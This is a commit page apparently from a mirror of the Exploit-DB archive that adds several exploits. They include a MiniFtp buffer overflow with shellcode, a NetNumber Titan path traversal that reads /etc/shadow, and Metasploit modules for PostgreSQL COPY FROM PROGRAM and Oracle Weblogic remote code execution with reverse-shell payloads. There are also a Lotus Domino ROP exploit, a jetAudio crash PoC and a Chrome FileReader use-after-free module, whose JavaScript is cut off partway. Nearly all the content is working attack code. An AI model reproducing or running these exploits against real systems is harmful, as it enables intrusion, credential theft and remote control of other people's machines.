bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-05-09

Browse source 
9 changes to exploits/shellcodes

jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)

MiniFtp - 'parseconf_load_setting' Buffer Overflow
Lotus Domino 8.5.3 - 'EXAMINE' Stack Buffer Overflow DEP/ASLR Bypass (NSA's EMPHASISMINE)
Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)
PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)
Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)

NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass

Linux/x86 - execve /bin/sh Shellcode (20 bytes)
This commit is contained in:
Offensive Security 2019-05-09 05:02:02 +00:00
parent 6822a23f82
commit 5a4d21a1cf
11 changed files with 1108 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

82
exploits/linux/local/46807.txt Normal file
View file

@ -0,0 +1,82 @@
# Exploit Title: MiniFtp parseconf_load_setting local-bufferoverflow (318 bytes)
# Google Dork: None
# Date: 11.04.2019
# Exploit Author: strider
# Vendor Homepage: https://github.com/skyqinsc/MiniFtp
# Software Link: https://github.com/skyqinsc/MiniFtp
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 318
------------------------------[Description]---------------------------------
This exploit spawns a shell with root privileges. The exploit will be written into the file miniftpd.conf
vuln code:
void parseconf_load_setting(const char *setting){
while(isspace(*setting)) setting++;
char key[128] = {0}, value[128] = {0};
str_split(setting, key, value, '=');
if(strlen(value) == 0){
fprintf(stderr, "missing value in config file for : %s\n", key);
exit(EXIT_FAILURE);
}
....
The given var settings is a *char and will be splitted into key and value key and value are both 128 char long and settings can be longer than 128 + 128 chars. this issue will not be checked and stored. This causes a buffer overflow.
after return it
-----------------------------[Gdb-Peda Dump]---------------------------------
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x48575250e7894851
RCX: 0xffffffd480050f3b
RDX: 0x90
RSI: 0x7fffffffd3a0 --> 0x9090909090909090
RDI: 0x55555555c854 ("download_max_rate")
RBP: 0x50f3bc08348e689
RSP: 0x7fffffffd460 --> 0x555555556860 (<_start>: xor ebp,ebp)
RIP: 0x7fffffffd481 --> 0x9090909090909090
R8 : 0xa ('\n')
R9 : 0x7fffffffd4a0 --> 0x9090909090909090
R10: 0x83a
R11: 0x7ffff7891520 (<__strcmp_sse2_unaligned>: mov eax,edi)
R12: 0x555555556860 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe200 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7fffffffd478: imul esi,DWORD PTR [rax+0x3d],0x90909090
0x7fffffffd47f: nop
0x7fffffffd480: nop
=> 0x7fffffffd481: nop
0x7fffffffd482: nop
0x7fffffffd483: nop
0x7fffffffd484: nop
0x7fffffffd485: nop
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffd460 --> 0x555555556860 (<_start>: xor ebp,ebp)
0008| 0x7fffffffd468 --> 0x55555555b5b2 ("miniftpd.conf")
0016| 0x7fffffffd470 ("max_per_ip=", '\220' <repeats 189 times>...)
0024| 0x7fffffffd478 --> 0x90909090903d7069
0032| 0x7fffffffd480 --> 0x9090909090909090
0040| 0x7fffffffd488 --> 0x9090909090909090
0048| 0x7fffffffd490 --> 0x9090909090909090
0056| 0x7fffffffd498 --> 0x9090909090909090
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007fffffffd481 in ?? ()
gdb-peda$
-----------------------------[Exploit]---------------------------------------------
python -c "print 'max_per_ip=' + '\x90' * 278 + '\x48\x31\xc0\x48\x31\xd2\x50\x49\xb9\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x51\x48\x89\xe7\x50\x52\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05' + '\x80\xd4\xff\xff\xff\x7f'" > miniftpd.conf
-----------------------------[how to run]-----------------------------
run the line above in a shell
run MiniFtp in gdb and you got a shell

36
exploits/linux/webapps/46811.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass
# Google Dork: N/A
# Date: 4/29/2019
# Exploit Author: MobileNetworkSecurity
# Vendor Homepage: https://www.netnumber.com/products/#data
# Software Link: N/A
# Version: Titan Master 7.9.1
# Tested on: Linux
# CVE : N/A
# Type: WEBAPP
*************************************************************************
A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1.
When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the webserver running with elevated privileges it is possible to download arbitrary files.
The HTTP request can be executed by any (even low privileged) user, so the authorization mechanism can be bypassed.
*************************************************************************
Proof of Concept (PoC):
http://X.X.X.X/drp?download=true&path=Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
The vulnerable path parameter is base64 encoded where the equal sign replaced by the dollar sign.
Original payload:
Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
Replaced dollar signs:
Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw==
Base64 decoded payload:
//SYSTEM/system/trace?download=t&el=../../../../etc/shadow
In the HTTP response you will receive the content of the file.
*************************************************************************
The issue has been fixed in the newer version of the software.

250
exploits/multiple/remote/46813.rb Executable file
View file

@ -0,0 +1,250 @@
\##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/postgres'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Postgres
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL COPY FROM PROGRAM Command Execution',
'Description' => %q(
Installations running Postgres 9.3 and above have functionality which allows for the superuser
and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.
This allows arbitrary command execution as though you have console access.
This module attempts to create a new table, then execute system commands in the context of
copying the command output into the table.
This module should work on all Postgres systems running version 9.3 and above.
For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl
For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp
Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload
or other customised command.
),
'Author' => [
'Jacob Wilkin' # Exploit Author of Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2019-9193'],
['URL', 'https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5'],
['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] #Patch notes adding the function, see 'E.26.3.3. Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)'
],
'PayloadType' => 'cmd',
'Platform' => %w(linux unix win osx),
'Payload' => {
},
'Arch' => [ARCH_CMD],
'Targets' =>
[
[
'Unix/OSX/Linux', {
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'Payload' => 'cmd/unix/reverse_perl' }
}
],[
'Windows - PowerShell (In-Memory)', {
'Platform' => 'windows',
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'Payload' => 'cmd/windows/powershell_reverse_tcp' }
}
],[
'Windows (CMD)',
'Platform' => 'win',
'Arch' => [ARCH_CMD],
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'adduser, generic'
}
}
],
],
'DisclosureDate' => 'Mar 20 2019'
))
register_options([
Opt::RPORT(5432),
OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]),
OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false])
])
deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
end
# Return the datastore value of the same name
# @return [String] tablename for table to use with command execution
def tablename
datastore['TABLENAME']
end
def check
vuln_version? ? CheckCode::Appears : CheckCode::Safe
end
def vuln_version?
version = postgres_fingerprint
return false unless version[:auth]
vprint_status version[:auth].to_s
version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first
if Gem::Version.new(version_full) >= Gem::Version.new('9.3')
return true
else
return false
end
end
def login_success?
status = do_login(username, password, database)
case status
when :noauth
print_error "#{peer} - Authentication failed"
return false
when :noconn
print_error "#{peer} - Connection failed"
return false
else
print_status "#{peer} - #{status}"
return true
end
end
def execute_payload
# Drop table if it exists
query = "DROP TABLE IF EXISTS #{tablename};"
drop_query = postgres_query(query)
case drop_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} dropped successfully"
else
print_error "#{peer} - Unknown"
return false
end
# Create Table
query = "CREATE TABLE #{tablename}(filename text);"
create_query = postgres_query(query)
case create_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} created successfully"
else
print_error "#{peer} - Unknown"
return false
end
# Copy Command into Table
cmd_filtered = payload.encoded.gsub("'", "''")
query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
copy_query = postgres_query(query)
case copy_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_warning "#{peer} - Unable to execute query: #{query}"
if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
print_error 'Insufficient permissions, User must be superuser or in pg_read_server_files group'
return false
end
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} copied successfully(valid syntax/command)"
else
print_error "#{peer} - Unknown"
return false
end
if datastore['DUMP_TABLE_OUTPUT']
# Select output from table for debugging
query = "SELECT * FROM #{tablename};"
select_query = postgres_query(query)
case select_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} contents:\n#{select_query}"
return true
else
print_error "#{peer} - Unknown"
return false
end
end
# Clean up table evidence
query = "DROP TABLE IF EXISTS #{tablename};"
drop_query = postgres_query(query)
case drop_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} dropped successfully(Cleaned)"
else
print_error "#{peer} - Unknown"
return false
end
end
def do_login(user, pass, database)
begin
password = pass || postgres_password
result = postgres_fingerprint(
db: database,
username: user,
password: password
)
return result[:auth] if result[:auth]
print_error "#{peer} - Login failed"
return :noauth
rescue Rex::ConnectionError
return :noconn
end
end
def exploit
#vuln_version doesn't seem to work
#return unless vuln_version?
return unless login_success?
print_status("Exploiting...")
if execute_payload
print_status("Exploit Succeeded")
else
print_error("Exploit Failed")
end
postgres_logout if @postgres_conn
end
end

172
exploits/multiple/remote/46814.rb Executable file
View file

@ -0,0 +1,172 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a malicious SOAP request to the interface WLS AsyncResponseService
to execute code on the vulnerable host.
},
'Author' =>
[
'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-2725'],
['CNVD-C', '2019-48814'],
['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
],
'Privileged' => false,
'Platform' => %w{ unix win solaris },
'Targets' =>
[
[ 'Unix',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
],
[ 'Windows',
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
],
[ 'Solaris',
'Platform' => 'solaris',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'WfsDelay' => 12
},
'DisclosureDate' => 'Apr 23 2019'))
register_options(
[
Opt::RPORT(7001),
OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(datastore['WSPATH']),
'method' => 'POST',
'ctype' => 'text/xml',
'headers' => {'SOAPAction' => '' }
)
if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
Exploit::CheckCode::Vulnerable
elsif res && res.code != 202
vprint_status("The target returned a non-vulnerable HTTP code")
Exploit::CheckCode::Safe
elsif res.nil?
vprint_status("The target did not respond in an expected way")
Exploit::CheckCode::Unknown
else
vprint_status("The target returned HTTP code: #{res.code}")
vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
Exploit::CheckCode::Unknown
end
end
def exploit
print_status("Generating payload...")
case target.name
when 'Windows'
string0_cmd = 'cmd.exe'
string1_param = '/c'
shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
when 'Unix','Solaris'
string0_cmd = '/bin/bash'
string1_param = '-c'
shell_payload = payload.encoded
end
random_action = rand_text_alphanumeric(20)
random_relates = rand_text_alphanumeric(20)
soap_payload = %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"|
soap_payload << %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"|
soap_payload << %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
soap_payload << %Q|<soapenv:Header>|
soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|
soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
soap_payload << %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
soap_payload << %Q|<void class="java.lang.ProcessBuilder">|
soap_payload << %Q|<array class="java.lang.String" length="3">|
soap_payload << %Q|<void index="0">|
soap_payload << %Q|<string>#{string0_cmd}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|<void index="1">|
soap_payload << %Q|<string>#{string1_param}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|<void index="2">|
soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
#soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|</array>|
soap_payload << %Q|<void method="start"/>|
soap_payload << %Q|</void>|
soap_payload << %Q|</work:WorkContext>|
soap_payload << %Q|</soapenv:Header>|
soap_payload << %Q|<soapenv:Body>|
soap_payload << %Q|<asy:onAsyncDelivery/>|
soap_payload << %Q|</soapenv:Body>|
soap_payload << %Q|</soapenv:Envelope>|
uri = normalize_uri(datastore['WSPATH'])
if uri.nil?
datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
end
print_status("Sending payload...")
begin
res = send_request_cgi(
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml',
'data' => soap_payload,
'headers' => {'SOAPAction' => '' }
)
rescue Errno::ENOTCONN
fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
end
if res.nil?
fail_with(Failure::Unreachable, "No response from host")
elsif res && res.code != 202
fail_with(Failure::UnexpectedReply,"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
end
end
end

21
exploits/windows/dos/46810.py Executable file
View file

@ -0,0 +1,21 @@
#Exploit Title: jetAudio 8.1.7.20702 Basic - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-07
#Vendor Homepage: http://www.jetaudio.com/
#Software Link: http://www.jetaudio.com/download/
#Tested Version: 8.1.7.20702
#Tested on: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64
#Steps to produce the crash:
#1.- Run python code: jetAudio_8.1.7.20702.py
#2.- Open jetAudio.txt and copy content to clipboard
#2.- Open jetAudio
#3.- Select Menu > Basic Controls > Open URL...
#4.- In "Enter URL" Paste ClipBoard after "http://"
#5.- Click on "Ok"
#6.- Crashed
cod = "\x41" * 5000
f = open('jetAudio.txt', 'w')
f.write(cod)
f.close()

18
exploits/windows/local/46805.py
View file

@ -16,14 +16,18 @@
# This got a bit hairy. We manually encoded our shellcode, and we had to use the sub method for each encode.
# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E and this was an odd character set.
# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set.
# calc.exe shellcode:
# "\x31\xc9\x51\x68"
# "\x63\x61\x6c\x63"
# "\x54\xB8\xc7\x93"
# "\xc2\x77\xff\xd0"
# Can replace with a shell, if you are willing to do the encoding and decoding math :-) Too preoccupied for now, so here is a calc.exe
# You would need to use logicla AND and the SUB EAX opcodes to get a value on the stack that could jump back to the A buffer, where there is
# much more room. Then you would need to align the stack with the value you need (not 0x012F3F4 as used below), and write upwards on the stack.
# You should have enough room for all of the logical AND and SUB EAX commands to get a full shell on the stack.
# For zeroing out registers before manual shellcode
zero = "\x25\x01\x01\x01\x01" # and eax, 0x01010101
@ -37,12 +41,12 @@ restore += "\x51" # push ecx; (to get the value on the stack for the mov esp co
# Stack alignment
# Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack.
# AFter making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
# After making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
alignment = "\x54" # push esp
alignment += "\x58" # pop eax; (puts the value of ESP into EAX)
# Write these 3 sub values in normal format, since memory address, not instruction to be executed.
# 364D5555 364D5555 364E5555
# 384D5555 364D5555 364E5555
alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555
alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555
alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555
@ -50,7 +54,7 @@ alignment += "\x50" # push eax
alignment += "\x5c" # pop esp; (puts the value of eax back into esp)
# calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers.
# 1st line = 2C552D14 01562D14 01562E16
# 1st line = 2C552D14 01552D14 01562E16
shellcode = zero
shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14
shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14
@ -80,9 +84,7 @@ shellcode += "\x50" # push eax
# We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall,
# We need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!)
# Here are the 3 values: 3F3F2711 3F3F2711 3F3F2811
# For some reason the application changed some of my math. 3F3F2811 was supposed to be
# 403F3F2811 and so I changed it by 1 hex byte to get the CC (was getting CD)
# Here are the 3 values: 403F2711 3F3F2711 3F3F2811
move = zero
move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x3F3F2711
move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711
@ -109,8 +111,6 @@ payload += shellcode
payload += move
payload += "\x43" * (5000-len(payload))
print payload
f = open('pwn.txt', 'w')
f.write(payload)
f.close()

67
exploits/windows/remote/46808.py Executable file
View file

@ -0,0 +1,67 @@
##########################################################
# #
# Here is a working version of the NSA's EMPHASISMINE #
# for IMAP Server Lotus Domino 8.5.3 FP0 #
# DEP/ASLR bypass #
# #
# Replace breakpoints with msfvenom payload #
# (ALPHANUMERIC) #
# I love you Alison Thompson OAM @ThirdWaveORG #
# Author: Charles Truscott @r0ss1n1 #
# #
###########################################################
import base64
import struct
import socket
import time
rop_and_roll = struct.pack('<I', 0x00433212) # POP ECX # RETN [nIMAP.EXE]
rop_and_roll += struct.pack('<I', 0x41414141) # Filler
rop_and_roll += struct.pack('<I', 0x7c37a140) # ptr to &VirtualProtect() [IAT MSVCR71.dll]
rop_and_roll += struct.pack('<I', 0x60609925) # MOV EAX,DWORD PTR DS:[ECX] # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x60b79a61) # XCHG EAX,ESI # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x62450fc4) # POP EBP # RETN [NLSCCSTR.DLL]
rop_and_roll += struct.pack('<I', 0x7c345c30) # & push esp # ret [MSVCR71.dll]
rop_and_roll += struct.pack('<I', 0x60165ba9) # POP EBX # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x00000001) # 0x00000001-> ebx
rop_and_roll += struct.pack('<I', 0x6020962e) # POP EDX # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x00001000) # 0x00001000-> edx
rop_and_roll += struct.pack('<I', 0x60e81a98) # POP ECX # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x00000040) # 0x00000040-> ecx
rop_and_roll += struct.pack('<I', 0x606609f9) # POP EDI # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x62136802) # RETN (ROP NOP) [nxmlproc.dll]
rop_and_roll += struct.pack('<I', 0x0042ba51) # POP EAX # RETN [nIMAP.EXE]
rop_and_roll += struct.pack('<I', 0x90909090) # nop
rop_and_roll += struct.pack('<I', 0x60505637) # PUSHAD # RETN [nnotes.dll]
username = "user"
password = "pass"
login=". LOGIN " + " " + '"' + username + '"' + " " + '"' + password + '"' + "\r\n"
payload = "\x90" * 556 + rop_and_roll + "\x90" * 20 + "\xCC" * (1500 - 556 - len(rop_and_roll) - 20)
encoded = base64.b64encode(payload)
crash = ". EXAMINE " + "&" + encoded + "\x0d\x0a"
print crash
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('172.16.65.128', 143))
time.sleep(3)
connectionresponse = expl.recv(1024)
print str(connectionresponse)
print "sending LOGIN request"
expl.send(login)
loginresponse = expl.recv(1024)
print str(loginresponse)
print "sending EXAMINE request"
print crash
expl.send(crash)
crashresponse = expl.recv(1024)
print str(crashresponse)
expl.close

432
exploits/windows_x86/remote/46812.rb Executable file
View file

@ -0,0 +1,432 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86',
'Description' => %q{
This exploit takes advantage of a use after free vulnerability in Google
Chrome 72.0.3626.119 running on Windows 7 x86.
The FileReader.readAsArrayBuffer function can return multiple references to the
same ArrayBuffer object, which can be freed and overwritten with sprayed objects.
The dangling ArrayBuffer reference can be used to access the sprayed objects,
allowing arbitrary memory access from Javascript. This is used to write and
execute shellcode in a WebAssembly object.
The shellcode is executed within the Chrome sandbox, so you must explicitly
disable the sandbox for the payload to be successful.
},
'License' => MSF_LICENSE,
'Author' => [
'Clement Lecigne', # discovery
'István Kurucsai', # Exodus Intel
'timwr', # metasploit module
],
'References' => [
['CVE', '2019-5786'],
['URL', 'https://github.com/exodusintel/CVE-2019-5786'],
['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'],
['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'],
['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'],
],
'Arch' => [ ARCH_X86 ],
'Platform' => 'windows',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
'Targets' => [ [ 'Automatic', { } ] ],
'DisclosureDate' => 'Mar 21 2019'))
end
def on_request_uri(cli, request)
print_status("Sending #{request.uri}")
if request.uri =~ %r{/exploit.html$}
html = %Q^
<html>
<head>
<script>
let myWorker = new Worker('worker.js');
let reader = null;
spray = null; // nested arrays used to hold the sprayed heap contents
let onprogress_cnt = 0; // number of times onprogress was called in a round
let try_cnt = 0; // number of rounds we tried
let last = 0, lastlast = 0; // last two AB results from the read
let tarray = 0; // TypedArray constructed from the dangling ArrayBuffer
const string_size = 128 * 1024 * 1024;
let contents = String.prototype.repeat.call('Z', string_size);
let f = new File([contents], "text.txt");
const marker1 = 0x36313233;
const marker2 = 0x37414546;
const outers = 256;
const inners = 1024;
function allocate_spray_holders() {
spray = new Array(outers);
for (let i = 0; i < outers; i++) {
spray[i] = new Array(inners);
}
}
function clear_spray() {
for (let i = 0; i < outers; i++) {
for (let j = 0; j < inners; j++) {
spray[i][j] = null;
}
}
}
function reclaim_mixed() {
// spray the heap to reclaim the freed region
let tmp = {};
for (let i = 0; i < outers; i++) {
for (let j = 0; j + 2 < inners; j+=3) {
spray[i][j] = {a: marker1, b: marker2, c: tmp};
spray[i][j].c = spray[i][j] // self-reference to find our absolute address
spray[i][j+1] = new Array(8);
spray[i][j+2] = new Uint32Array(32);
}
}
}
function find_pattern() {
const start_offset = 0x00afc000 / 4;
for (let i = start_offset; i + 1 < string_size / 4; i++) {
if (i < 50){
console.log(tarray[i].toString(16));
}
// multiply by two because of the way SMIs are stored
if (tarray[i] == marker1 * 2) {
if (tarray[i+1] == marker2 * 2) {
console.log(`found possible candidate objectat idx ${i}`);
return i;
}
}
}
return null;
}
function get_obj_idx(prop_idx) {
// find the index of the Object in the spray array
tarray[prop_idx] = 0x62626262;
for (let i = 0; i < outers; i++) {
for (let j = 0; j < inners; j+=1) {
try {
if (spray[i][j].a == 0x31313131) {
console.log(`found object idx in the spray array: ${i} ${j}`);
return spray[i][j];
}
} catch (e) {}
}
}
}
function ta_read(addr) {
// reads an absolute address through the original freed region
// only works for ta_absolute_addr + string_size (128MiB)
if (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) {
return tarray[(addr-ta_absolute_addr)/4];
}
return 0;
}
function ta_write(addr, value) {
// wrtie to an absolute address through the original freed region
// only works for ta_absolute_addr + string_size (128MiB)
if (addr % 4 || value > 2**32 - 1 ||
addr < ta_absolute_addr ||
addr > ta_absolute_addr + string_size) {
console.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`);
}
tarray[(addr-ta_absolute_addr)/4] = value;
}
function get_corruptable_ui32a() {
// finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region
for (let i = 0; i < outers; i++) {
for (let j = 0; j + 2 < inners; j+=3) {
let ui32a_addr = addrof(spray[i][j+2]) - 1;
let bs_addr = ta_read(ui32a_addr + 12) - 1;
let elements_addr = ta_read(ui32a_addr + 8) - 1;
// read its elements pointer
// if the elements ptr lies inside the region we have access to
if (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size &&
elements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) {
console.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`);
return {
bs_addr: bs_addr,
elements_addr: elements_addr,
ui32: spray[i][j+2],
i: i, j: j
}
}
}
}
}
var reader_obj = null;
var object_prop_taidx = null;
var ta_absolute_addr = null;
var aarw_ui32 = null;
function addrof(leaked_obj) {
reader_obj.a = leaked_obj;
return tarray[object_prop_taidx];
}
function read4(addr) {
// save the old values
let tmp1 = ta_read(aarw_ui32.elements_addr + 12);
let tmp2 = ta_read(aarw_ui32.bs_addr + 16);
// rewrite the backing store ptr
ta_write(aarw_ui32.elements_addr + 12, addr);
ta_write(aarw_ui32.bs_addr + 16, addr);
let val = aarw_ui32.ui32[0];
ta_write(aarw_ui32.elements_addr + 12, tmp1);
ta_write(aarw_ui32.bs_addr + 16, tmp2);
return val;
}
function write4(addr, val) {
// save the old values
let tmp1 = ta_read(aarw_ui32.elements_addr + 12);
let tmp2 = ta_read(aarw_ui32.bs_addr + 16);
// rewrite the backing store ptr
ta_write(aarw_ui32.elements_addr + 12, addr);
ta_write(aarw_ui32.bs_addr + 16, addr);
aarw_ui32.ui32[0] = val;
ta_write(aarw_ui32.elements_addr + 12, tmp1);
ta_write(aarw_ui32.bs_addr + 16, tmp2);
}
function get_rw() {
// free up as much memory as possible
// spray = null;
// contents = null;
force_gc();
// attepmt reclaiming the memory pointed to by dangling pointer
reclaim_mixed();
// access the reclaimed region as a Uint32Array
tarray = new Uint32Array(lastlast);
object_prop_taidx = find_pattern();
if (object_prop_taidx === null) {
console.log('ERROR> failed to find marker');
window.top.postMessage(`ERROR> failed to find marker`, '*');
return;
}
